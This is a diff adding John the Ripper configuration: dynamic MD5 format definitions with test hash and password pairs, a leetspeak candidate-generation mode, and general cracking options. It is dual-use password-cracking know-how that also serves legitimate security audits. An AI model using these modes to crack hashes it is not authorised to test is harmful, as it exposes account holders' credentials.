+dynamic_492 = Y
+dynamic_493 = Y
+dynamic_494 = Y
+dynamic_495 = Y
+dynamic_496 = Y
+dynamic_497 = Y
+dynamic_498 = Y
+dynamic_501 = Y
+dynamic_502 = Y
+dynamic_503 = Y
+dynamic_504 = Y
+dynamic_505 = Y
+dynamic_506 = Y
+dynamic_507 = Y
+dynamic_508 = Y
+dynamic_511 = Y
+dynamic_512 = Y
+dynamic_513 = Y
+dynamic_514 = Y
+dynamic_515 = Y
+dynamic_516 = Y
+dynamic_517 = Y
+dynamic_518 = Y
+dynamic_521 = Y
+dynamic_522 = Y
+dynamic_523 = Y
+dynamic_524 = Y
+dynamic_525 = Y
+dynamic_526 = Y
+dynamic_527 = Y
+dynamic_528 = Y
+dynamic_531 = Y
+dynamic_532 = Y
+dynamic_533 = Y
+dynamic_534 = Y
+dynamic_535 = Y
+dynamic_536 = Y
+dynamic_537 = Y
+dynamic_538 = Y
+dynamic_541 = Y
+dynamic_542 = Y
+dynamic_543 = Y
+dynamic_544 = Y
+dynamic_545 = Y
+dynamic_546 = Y
+dynamic_547 = Y
+dynamic_548 = Y
+dynamic_551 = Y
+dynamic_552 = Y
+dynamic_553 = Y
+dynamic_554 = Y
+dynamic_555 = Y
+dynamic_556 = Y
+dynamic_557 = Y
+dynamic_558 = Y
+dynamic_561 = Y
+dynamic_562 = Y
+dynamic_563 = Y
+dynamic_564 = Y
+dynamic_565 = Y
+dynamic_566 = Y
+dynamic_567 = Y
+dynamic_568 = Y
+dynamic_571 = Y
+dynamic_572 = Y
+dynamic_573 = Y
+dynamic_574 = Y
+dynamic_575 = Y
+dynamic_576 = Y
+dynamic_577 = Y
+dynamic_578 = Y
+dynamic_581 = Y
+dynamic_582 = Y
+dynamic_583 = Y
+dynamic_584 = Y
+dynamic_585 = Y
+dynamic_586 = Y
+dynamic_587 = Y
+dynamic_588 = Y
+dynamic_591 = Y
+dynamic_592 = Y
+dynamic_593 = Y
+dynamic_594 = Y
+dynamic_595 = Y
+dynamic_596 = Y
+dynamic_597 = Y
+dynamic_598 = Y
+dynamic_601 = Y
+dynamic_602 = Y
+dynamic_603 = Y
+dynamic_604 = Y
+dynamic_605 = Y
+dynamic_606 = Y
+dynamic_607 = Y
+dynamic_608 = Y
+dynamic_611 = Y
+dynamic_612 = Y
+dynamic_613 = Y
+dynamic_614 = Y
+dynamic_615 = Y
+dynamic_616 = Y
+dynamic_617 = Y
+dynamic_618 = Y
+dynamic_621 = Y
+dynamic_622 = Y
+dynamic_623 = Y
+dynamic_624 = Y
+dynamic_625 = Y
+dynamic_626 = Y
+dynamic_627 = Y
+dynamic_628 = Y
+dynamic_631 = Y
+dynamic_632 = Y
+dynamic_633 = Y
+dynamic_634 = Y
+dynamic_635 = Y
+dynamic_636 = Y
+dynamic_637 = Y
+dynamic_638 = Y
+dynamic_641 = Y
+dynamic_642 = Y
+dynamic_643 = Y
+dynamic_644 = Y
+dynamic_645 = Y
+dynamic_646 = Y
+dynamic_647 = Y
+dynamic_648 = Y
+dynamic_651 = Y
+dynamic_652 = Y
+dynamic_653 = Y
+dynamic_654 = Y
+dynamic_655 = Y
+dynamic_656 = Y
+dynamic_657 = Y
+dynamic_658 = Y
+dynamic_661 = Y
+dynamic_662 = Y
+dynamic_663 = Y
+dynamic_664 = Y
+dynamic_665 = Y
+dynamic_666 = Y
+dynamic_667 = Y
+dynamic_668 = Y
+dynamic_671 = Y
+dynamic_672 = Y
+dynamic_673 = Y
+dynamic_674 = Y
+dynamic_675 = Y
+dynamic_676 = Y
+dynamic_677 = Y
+dynamic_678 = Y
+dynamic_681 = Y
+dynamic_682 = Y
+dynamic_683 = Y
+dynamic_684 = Y
+dynamic_685 = Y
+dynamic_686 = Y
+dynamic_687 = Y
+dynamic_688 = Y
+dynamic_691 = Y
+dynamic_692 = Y
+dynamic_693 = Y
+dynamic_694 = Y
+dynamic_695 = Y
+dynamic_696 = Y
+dynamic_697 = Y
+dynamic_698 = Y
+
+dynamic_1033 = Y
@@ -0,0 +1,212 @@
+# NOTE, same format as dynamic_0  It is slower (50% slower, or more).  But it is not limited to 55 byte passwords.
+# This should work for passwords up to 110 bytes long (max length dynamic will currently allow). It should not be
+# used for shorter passwords (under 55 bytes).  Use dyna_0 for those.
+[List.Generic:dynamic_2000]
+Expression=md5($p) (PW > 55 bytes)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SOURCE
+Flag=MGF_POOR_OMP
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2000$5a105e8b9d40e1329780d62ea2265d8a:test1
+Test=$dynamic_2000$378e2c4a07968da2eca692320136433d:thatsworking
+Test=$dynamic_2000$8ad8757baa8564dc136c1e07507f4a98:test3
+TestD=$dynamic_2000$a4b3933521a38111eb597dd8dbc47614:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2001]
+Expression=md5($p.$s) (joomla) (PW > 23 bytes)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2001$ed52af63d8ecf0c682442dfef5f36391$1aDNNojYGSc7pSzcdxKxhbqvLtEe4deG:test1
+Test=$dynamic_2001$4fa1e9d54d89bfbe48b4c0f0ca0a3756$laxcaXPjgcdKdKEbkX1SIjHKm0gfYt1c:thatsworking
+Test=$dynamic_2001$82568eeaa1fcf299662ccd59d8a12f54$BdWwFsbGtXPGc0H1TBxCrn0GasyAlJBJ:test3
+TestD=$dynamic_2001$a4d4ce08d9dec5336d2a137cdab28624$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2002]
+Expression=md5(md5($p)) (e107) (PW > 55 bytes)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2002$418d89a45edadb8ce4da17e07f72536c:test1
+Test=$dynamic_2002$ccd3c4231a072b5e13856a2059d04fad:thatsworking
+Test=$dynamic_2002$9992295627e7e7162bdf77f14734acf8:test3
+TestD=$dynamic_2002$827b31e7fae2cdb3af70be9560162500:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2003]
+Expression=md5(md5(md5($p))) (PW > 55 bytes)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2003$964c02612b2a1013ed26d46ba9a73e74:test1
+Test=$dynamic_2003$5d7e6330f69548797c07d97c915690fe:thatsworking
+Test=$dynamic_2003$2e54db8c72b312007f3f228d9d4dd34d:test3
+TestD=$dynamic_2003$35297f9d34baa8e3ca3e5b23155be26f:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2004]
+Expression=md5($s.$p) (OSC) (PW > 31 bytes)
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2004$c02e8eef3eaa1a813c2ff87c1780f9ed$123456:test1
+Test=$dynamic_2004$4a2a1b013da3cda7f7e0625cf3dc3f4c$1234:thatsworking
+Test=$dynamic_2004$3a032e36a9609df6411b8004070431d3$aaaaa:test3
+TestD=$dynamic_2004$d75040e824c1f9e4efd67c19961ddf4d$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2005]
+Expression=md5($s.$p.$s) (PW > 31 bytes)
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-40
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2005$c1003cd39cb5523dd0923a94ab15a3c7$123456:test1
+Test=$dynamic_2005$c1c8618abfc7bdbc4a3c49c2c2c48f82$1234:thatsworking
+Test=$dynamic_2005$e7222e806a8ce5efa6d48acb3aa56dc2$aaaaa:test3
+TestD=$dynamic_2005$ba5528ac65c20213e105bb02e6aaf6a2$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2006]
+Expression=md5(md5($p).$s) (PW > 55 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_32
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2006$3a9ae23758f05da1fe539e55a096b03b$S111XB:test1
+Test=$dynamic_2006$9694d706d1992abf04344c1e7da1c5d3$T &222:thatsworking
+Test=$dynamic_2006$b7a7f0c374d73fac422bb01f07f5a9d4$lxxxl:test3
+Test=$dynamic_2006$9164fe53be481f811f15efd769aaf0f7$aReallyLongSaltHere:test3
+TestD=$dynamic_2006$7308f7ca156d77564a5dab25d4be0f34$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2008]
+Expression=md5(md5($s).$p) (PW > 23 bytes)
+Flag=MGF_SALTED
+Flag=MGF_SALT_AS_HEX
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2008$534c2fb38e757d9448315abb9822db00$aaaSXB:test1
+Test=$dynamic_2008$02547864bed278658e8f54dd6dfd69b7$123456:thatsworking
+Test=$dynamic_2008$2f6f3881972653ebcf86e5ad3071a4ca$5555hh:test3
+TestD=$dynamic_2008$a96d6ab818950bafc6baeaa80df5ec5c$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2009]
+Expression=md5($s.md5($p)) (salt > 23 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-200
+MaxInputLenX86=40
+MaxInputLen=40
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2009$b38c18b5e5b676e211442bd41000b2ec$aaaSXB:test1
+Test=$dynamic_2009$4dde7cd4cbf0dc4c59b255ae77352914$123456:thatsworking
+Test=$dynamic_2009$899af20e3ebdd77aaecb0d9bc5fbbb66$5555hh:test3
+
+[List.Generic:dynamic_2010]
+Expression=md5($s.md5($s.$p)) (PW > 32 or salt > 23 bytes)
+Flag=MGF_SALTED
+#Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2010$781f83a676f45169dcfc7f36dfcdc3d5$aaaSXB:test1
+Test=$dynamic_2010$f385748e67a2dc1f6379b9124fabc0df$123456:thatsworking
+Test=$dynamic_2010$9e3702bb13386270cd4b0bd4dbdd489e$5555hh:test3
+TestD=$dynamic_2010$74fe90a89e9e6ee5ea28d4a92640eda5$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2011]
+Expression=md5($s.md5($p.$s)) (PW > 32 or salt > 23 bytes)
+Flag=MGF_SALTED
+#Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2011$f809a64cbd0d23e099cd5b544c8501ac$aaaSXB:test1
+Test=$dynamic_2011$979e6671535cda6db95357d8a0afd9ac$123456:thatsworking
+Test=$dynamic_2011$78a61ea73806ebf27bef2ab6a9bf5412$5555hh:test3
+TestD=$dynamic_2011$d5acc2492e19cbf252d54942b4c7620b$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+#[List.Generic:dynamic_2012]
+#dynamic_12 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2012
+
+#[List.Generic:dynamic_2013]
+#dynamic_13 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2013
+
+[List.Generic:dynamic_2014]
+Expression=md5($s.md5($p).$s) (PW > 55 or salt > 11 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-40
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2014$778e40e10d82a08f5377992330008cbe$aaaSXB:test1
+Test=$dynamic_2014$d6321956964b2d27768df71d139eabd2$123456:thatsworking
+Test=$dynamic_2014$1b3c72e16427a2f4f0819243877f7967$5555hh:test3
+TestD=$dynamic_2014$6f20299d2e889eea146d141e92e91da1$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+#[List.Generic:dynamic_2015]
+#dynamic_15 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2015
+
+#[List.Generic:dynamic_2016]
+#dynamic_16 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2016
@@ -0,0 +1,344 @@
+[List.HybridLeet:new]
+    int i, j;
+	int c, p;
+	int totrots;
+	int length;
+
+	/* Get the word length */
+	length = 0; while (word[length++]) ; --length;
+
+	/* Skip if this word length is out of bounds
+	   This should not be necessary, but we'll leave it here to be defensive */
+	if (req_minlen > length || (req_maxlen && req_maxlen < length ))
+	{
+		hybrid_total = 0;
+		return;
+	}
+
+	/* Calculate word rotations */
+
+	word_rot_count=0; 	/* Number of letter positions we are rotating for this word */
+	totrots = 1; 		/* Number of total rotation iterations */
+
+	i=0;
+	while (i < length)
+	{
+		/* is this letter one of our rotators? a,A, b,B etc*/
+		c = word[i];
+		j = 0;
+		while (j < rot_poslen)
+		{
+			p = rot_pos[j];
+			if (c == rot_chars[p] || c == rot_chars[p+1]) 	/* Is 'a' or 'A' for example */
+			{
+				word_rot_idx[word_rot_count] = i;		/* Save off which letter position in the word we are rotating */
+				word_rot_pos[word_rot_count] = j;		/* Save off the rotation position for this slot */
+				word_rotchars_pos[word_rot_count] = p; 	/* Save off the first letter position in the rotation */
+				word_rot_count++;
+
+				/* Also, set the word to the first letter in the rotation so we ensure to go through all of them */
+				word[i] = rot_chars[p];
+
+				/* And multiple number of total rotations by the number of rotations for this position */
+				totrots = totrots * rot_len[j];
+
+				break;
+			}
+			j++;
+		}
+		i++;
+	}
+
+	hybrid_total = totrots;
+
+	/* Reset or counter for THIS word. */
+	word_rot_current = 0;
+
+[List.External:HybridLeet]
+
+/*
+    Static context
+    String lengths here are arbitrary, increase them if you increase the
+    size of the stuff in the init() procedure
+*/
+
+int rot_chars[256];		/* All characters to rotate */
+int rot_charslen;    	/* The length of the rot_chars buffer */
+
+int rot_len[26];    	/* The number of characters to rotate through per letter */
+int rot_pos[26];    	/* The starting position of each letter group in the rot_chars string */
+int rot_poslen;			/* Length of rot_pos and rot_len arrays (both same size) */
+
+int word_rot_idx[128];  		/* The positions in the current word that require rotations (index into word)*/
+int word_rot_pos[128];  		/* The rot_pos index for each letter position in the current word that we are rotating (index into rot_pos)*/
+int word_rotchars_pos[128];  	/* The current rot_chars index for each letter position in the current word that we are rotating (state of rotation, index into rot_chars)*/
+int word_rot_count;     		/* The number of letters that we are rotating in the current word (size of word_rot_idx, word_rot_pos, and word_rotchars_pos) */
+
+int word_rot_current;	/* The rotation number of the current word */
+
+void init()
+{
+	int rci;
+	int ri;
+
+	rot_charslen=0;
+	rci=0;
+	ri=0;
+
+	/* a */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'a'; /* The first two chars are always the lower */
+	rot_chars[rci++] = 'A'; /* and upper case letters to rotate on */
+	rot_chars[rci++] = '4';
+	rot_chars[rci++] = '@';
+	rot_chars[rci++] = '8';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* b */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'b';
+	rot_chars[rci++] = 'B';
+	rot_chars[rci++] = '8';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'c';
+	rot_chars[rci++] = 'C';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'd';
+	rot_chars[rci++] = 'D';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* e */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'e';
+	rot_chars[rci++] = 'E';
+	rot_chars[rci++] = '3';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'f';
+	rot_chars[rci++] = 'F';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'g';
+	rot_chars[rci++] = 'G';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* h */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'h';
+	rot_chars[rci++] = 'H';
+	rot_chars[rci++] = '#';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* i */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'i';
+	rot_chars[rci++] = 'I';
+	rot_chars[rci++] = '1';
+	rot_chars[rci++] = '!';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'j';
+	rot_chars[rci++] = 'J';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'k';
+	rot_chars[rci++] = 'K';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* l */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'l';
+	rot_chars[rci++] = 'L';
+	rot_chars[rci++] = '1';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'm';
+	rot_chars[rci++] = 'M';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'n';
+	rot_chars[rci++] = 'N';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* o */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'o';
+	rot_chars[rci++] = 'O';
+	rot_chars[rci++] = '0';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'p';
+	rot_chars[rci++] = 'P';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'q';
+	rot_chars[rci++] = 'Q';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'r';
+	rot_chars[rci++] = 'R';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* s */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 's';
+	rot_chars[rci++] = 'S';
+	rot_chars[rci++] = '$';
+	rot_chars[rci++] = '5';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* t */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 't';
+	rot_chars[rci++] = 'T';
+	rot_chars[rci++] = '+';
+	rot_chars[rci++] = '7';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'u';
+	rot_chars[rci++] = 'U';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'v';
+	rot_chars[rci++] = 'V';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'w';
+	rot_chars[rci++] = 'W';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'x';
+	rot_chars[rci++] = 'X';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'y';
+	rot_chars[rci++] = 'Y';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'z';
+	rot_chars[rci++] = 'Z';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_charslen = rci;
+	rot_poslen = ri;
+
+}
+
+/* new word */
+void new()
+{
+.include [List.HybridLeet:new]
+}
+
+void next()
+{
+	int i, j;
+
+	/* If we have reached the maximum number of rotations, we're done */
+	if (word_rot_current == hybrid_total)
+	{
+		word[0] = 0;
+		return;
+	}
+
+	/* set word[] to the next candidate */
+	i=0;
+	while (i < word_rot_count)
+	{
+		/* Replace letter in word with appropriate rotated letter fom rot_chars */
+		word[word_rot_idx[i]] = rot_chars[word_rotchars_pos[i]];
+		i++;
+	}
+
+	/* Rotate the word_rotchars_pos */
+	i=0;
+	while (i < word_rot_count)
+	{
+		word_rotchars_pos[i]++;
+
+		j = word_rot_pos[i];
+		if (word_rotchars_pos[i] != (rot_pos[j] + rot_len[j]))
+		{
+			/* No carry */
+			break;
+		}
+
+		/* Rotation overflow, carry to next rotation */
+		word_rotchars_pos[i] = rot_pos[j];
+
+		i++;
+	}
+
+	word_rot_current++;
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int wrc;
+
+.include [List.HybridLeet:new]
+
+	/* Pick up the current iteration */
+	word_rot_current = hybrid_resume;
+
+	/* Zoom the word_rotchars_pos to the hybrid_resume iteration */
+	i=0;
+	wrc = word_rot_current;
+
+	while (i < word_rot_count)
+	{
+		j = word_rot_pos[i];
+
+		/* Rotate this position */
+		word_rotchars_pos[i] = rot_pos[j] + (wrc % rot_len[j]);
+		wrc = wrc / rot_len[j];
+
+		i++;
+	}
+}
@@ -0,0 +1,3899 @@
+#
+# This file is part of John the Ripper password cracker,
+# Copyright (c) 1996-2006,2008-2013 by Solar Designer
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# There's ABSOLUTELY NO WARRANTY, express or implied.
+#
+# Please note that although this configuration file is under the cut-down BSD
+# license above, many source files in John the Ripper are under GPLv2.
+# For licensing terms for John the Ripper as a whole, see doc/LICENSE.
+#
+# ...with changes in the jumbo patch, by various authors
+#
+
+# The [Options] section is for general options only.
+# Note that MPI specific options have been moved
+# to [Options.MPI]
+# There is also a new section [Options.OpenCL]
+# for OpenCL specific options
+# Default settings for Markov mode have been moved
+# to [Markov.Default], but you can define other
+# Markov modes as well, see ../doc/MARKOV
+[Options]
+# Default wordlist file name (including in batch mode)
+Wordlist = $JOHN/password.lst
+# Use idle cycles only
+Idle = Y
+# Crash recovery file saving delay in seconds
+Save = 60
+# Beep when a password is found (who needs this anyway?)
+Beep = N
+# if set to Y then dynamic format will always work with bare hashes. Normally
+# dynamic only uses bare hashes if a single dynamic type is selected with
+# the -format=  (so -format=dynamic_0 would use valid bare hashes).
+DynamicAlwaysUseBareHashes = N
+
+# Default Single mode rules
+SingleRules = Single
+
+# Default batch mode Wordlist rules
+BatchModeWordlistRules = Wordlist
+
+# Default wordlist mode rules when not in batch mode (if any)
+# If this is set and you want to run once without rules, use --rules:none
+#WordlistRules = Wordlist
+
+# Default loopback mode rules (if any)
+# If this is set and you want to run once without rules, use --rules:none
+LoopbackRules = Loopback
+
+# Max. number of times to warn about crypting suboptimally small batches,
+# before suppressing the warnings.
+MaxKPCWarnings = 10
+
+# If set to true, relax the KPC warning checks and only warn for really
+# bad situations (the fewer salts, the more slack).
+RelaxKPCWarningCheck = N
+
+# Default/batch mode Incremental mode
+# Warning: changing these might currently break resume on existing sessions
+DefaultIncremental = ASCII
+#DefaultIncrementalUTF8 = UTF8
+DefaultIncrementalLM = LM_ASCII
+
+# Time formatting string used in status ETA.
+#
+# TimeFormat24 is used when ETA is within 24h, so it is possible to omit
+# the date then if you like, and show seconds instead.
+#
+# %c  means 'local' specific canonical form, such as:
+# 05/06/11 18:10:34
+#
+# Other examples
+# %d/%m/%y %H:%M   (day/mon/year hour:min)
+# %m/%d/%y %H:%M   (mon/day/year hour:min)
+# %Y-%m-%d %H:%M   (ISO 8601 style, 2011-05-06 18:10)
+TimeFormat = %Y-%m-%d %H:%M
+TimeFormat24 = %H:%M:%S
+
+#
+# optional add a date timestamp in front of every logged line.
+# the default is no timestamp logging. See the docs for
+# strftime for more information:
+# http://en.cppreference.com/w/c/chrono/strftime
+#
+# 2016-02-20T22:35:38+01:00 would be %Y-%m-%dT%H:%M:%S%z
+# Feb 20 22:35:38           would be %b %d %H:%M:%S
+#LogDateFormat = %Y-%m-%dT%H:%M:%S%z
+
+# if log date is being used, the time will default to local
+# time.  But if the next line is uncommented, it will output
+# in UTC.  Note, if LogDateFormat is not set, this option
+# does nothing.
+#LogDateFormatUTC = Y
+
+# if logging to stderr (--log-stderr command line switch used),
+# then use date format when outputting to the stderr.
+#LogDateStderrFormat = %b %d %H:%M:%S
+
+# This can be used to colorize (on screen) or otherwise emphasize (in log
+# files) output whenever a supposed administrator password gets cracked.
+#
+# Set this to N or comment it out to disable all "MarkAdmin" stuff.
+MarkAdminCracks = Y
+
+# If MarkAdminCracks = Y above, the below will be used (if defined) for
+# terminal output. The default is to change color to red before the username
+# and reset to normal after it. Any "^" characters will be parsed as ESC for
+# use in ANSI codes (like in the defaults)
+MarkAdminStart = ^[31m
+MarkAdminEnd = ^[0m
+
+# If MarkAdminCracks = Y above, the below will be used (if defined) for logs.
+# This literal string will be printed after the " + Cracked: root" line.
+MarkAdminString = (ADMIN ACCOUNT)
+
+# Permissions to set for session.log file
+# Default is 0600
+#LogFilePermissions = 0600
+
+# Permissions to set for POT file
+# Default is 0600
+#PotFilePermissions = 0600
+
+# John exits if another user owns log or pot file because CHMOD fails,
+# If this is set John prints a warning and continues
+# Default is N
+#IgnoreChmodErrors = N
+
+# This figure is in MB. The default is to memory map wordlists not larger
+# than one terabyte.
+# Set this to 0 to disable any use of memory-mapping in wordlist mode.
+WordlistMemoryMapMaxSize = 1048576
+
+# For single mode, load the full GECOS field (before splitting) as one
+# additional candidate. Normal behavior is to only load individual words
+# from that field. Enabling this can help when this field contains email
+# addresses or other strings that are better used unsplit, but it increases
+# the number of words tried so it may also slow things down.
+PristineGecos = N
+
+# Add an extra pass when loading Single words, that tries to parse things
+# like JEdgarHoover to J Edgar Hoover and so on.
+JumboSingleWords = N
+
+# For single mode, ignore the login field.
+# Normal behavior is to use the login field for single mode.
+# Skipping the login field should only be enabled if previous single mode
+# sessions did already make use of the login field, but no other information,
+# and now you want to use other information, skip the login field, but still
+# want the login field to be reported on successful cracks or with --show.
+SingleSkipLogin = N
+
+# Over-ride SINGLE_WORDS_PAIR_MAX in params.h.  This may slow down Single mode
+# but it may also help cracking a few more candidates.  Default in core John
+# is 4 while the Jumbo default is 6.  This limit is automagically increased
+# by word seed options --single-seed and/or --single-wordlist if needed.
+SingleWordsPairMax = 6
+
+# Un-commenting this stops Single mode from re-testing guessed plaintexts
+# with all other salts.
